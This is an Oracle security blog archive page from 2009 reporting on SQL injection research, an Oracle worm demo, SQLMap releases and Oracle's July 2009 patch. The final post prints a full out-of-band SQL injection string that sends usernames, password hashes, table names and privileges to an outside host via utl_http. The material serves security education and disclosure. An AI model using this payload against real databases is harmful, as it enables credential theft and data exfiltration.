5 Aug 2009 von Alexander Kornbrust.

Sumit Siddharth has published his Defcon presentation about “The Making of Second SQL Injection Worm (Oracle Edition)“.

Sumit describes the differences between SQL Injection and PL/SQL Injection and presents his tool “oap_hacker.pl” which allows to run OS commands via Java. oap_hacker.pl and Bsqlbf v.2.3 are using a PL/SQL Injection bug in dbms_export_extension (the old one and not the new one which was fixed with the CPU July 2009).

BTW, the (underground) tool darkORASQLi.py to dump data from Oracle databases is also using the dbms_export_extension vulnerability to run OS command.

A demo of his Oracle worm ora_w0rm.pl is available on YouTube.

Here are some screenshots how to overtake a client PC accessing an (via worm) infected Oracle System:

Very interesting work. Thanks Sumit for this presentation.

Geschrieben in Exploit, SQL Injection, Oracle Security | Drucken | 1 Kommentar »

29 Jul 2009 von Alexander Kornbrust.

The Oracle & Metasploit material (PDF, Slides) from the Blackhat 2009 conference from Chris Gates is already online. A short review will be done tomorrow.

Geschrieben in Tools, SQL Injection, Security | Drucken | Keine Kommentare »

26 Jul 2009 von Alexander Kornbrust.

Bernardo Damele has released a new version of his SQL Injection Tool SQLMap 0.7.1. This version comes with new features like support for Mac OSX, support of Metasploit wrapping functions plus several bugfixes (changelog).

Geschrieben in SQL Injection, software | Drucken | Keine Kommentare »

15 Jul 2009 von Alexander Kornbrust.

Yesterday night Oracle released the July 2009 CPU. This CPU contains 30 fixes for several Oracle products. 10 security issues are fixed in the Oracle Database Server.As always the usual suspects (Esteban, David, Joxean, Alexandr, Dennis) and a few others reported issues in Oracle products.

The 3 most critical bugs this time are related to the TNS Listener and one of the bugs be exploited without authentication.These issues CVE-2009-1020, CVE-2009-1019, CVE-2009-1963 are rated with CVSS 9 (for Windows), 7.5 for Unix.
Oracle has also fixed 3 of my findings in the database (3 out of 10 :-))

• SQL Injection in DBMS_EXPORT_EXTENSION (previously fixed in April 2006)
• Information Disclosure (Password Hash) in Database Vault
• Information Disclosure (Password Hash) in Audit Vault

More details will be published within the next few days. The updates for our Oracle database scanner Repscan (free trial available) will be released within the next 2 days.

Geschrieben in SQL Injection, Security, Allgemein | Drucken | 1 Kommentar »

16 Mai 2009 von Alexander Kornbrust.

I just uploaded the presentation “SQL Injection in Oracle Webapps” to our website. This presentation describes the basics of SQL, different exploitation techniques (inband, out-of-band, blind), how to search creditcard numbers in the database (using dbms_xmlgen), …Here is one of the sample SQL Injection strings from the presentation. With this  SQL Injection string we are getting all username/passwords, all table names, all column names and all privileges in one step. The trick is to use sum(length(utl_http())) in the SELECT clause.

http://victim.com/order.jsp?id=17‘ or 1=((select

sum(length(utl_http.request(’http://www.orasploit.com/’||

username||’='||password) from dba_users)))+((select

sum(utl_http.request(’http://www. orasploit.com/’||

owner||’='||table_name) from dba_tables))+((select

sum(length(utl_http.request(’http://www.orasploit.com/’||

owner||’='||table_name||’='||column_name)) from dba_users))

+((select sum(length(utl_http.request(’http://

www.orasploit.com/’||grantee||’='||granted_role) from

dba_role_privs)))+((select

sum(length(utl_http.request(’http://www.orasploit.com/’||

grantee||’='||owner||’='||table_name||’='||privilege||’='||

grantable) from dba_tab_privs)))–

Geschrieben in SQL Injection, Security, Allgemein | Drucken | 1 Kommentar »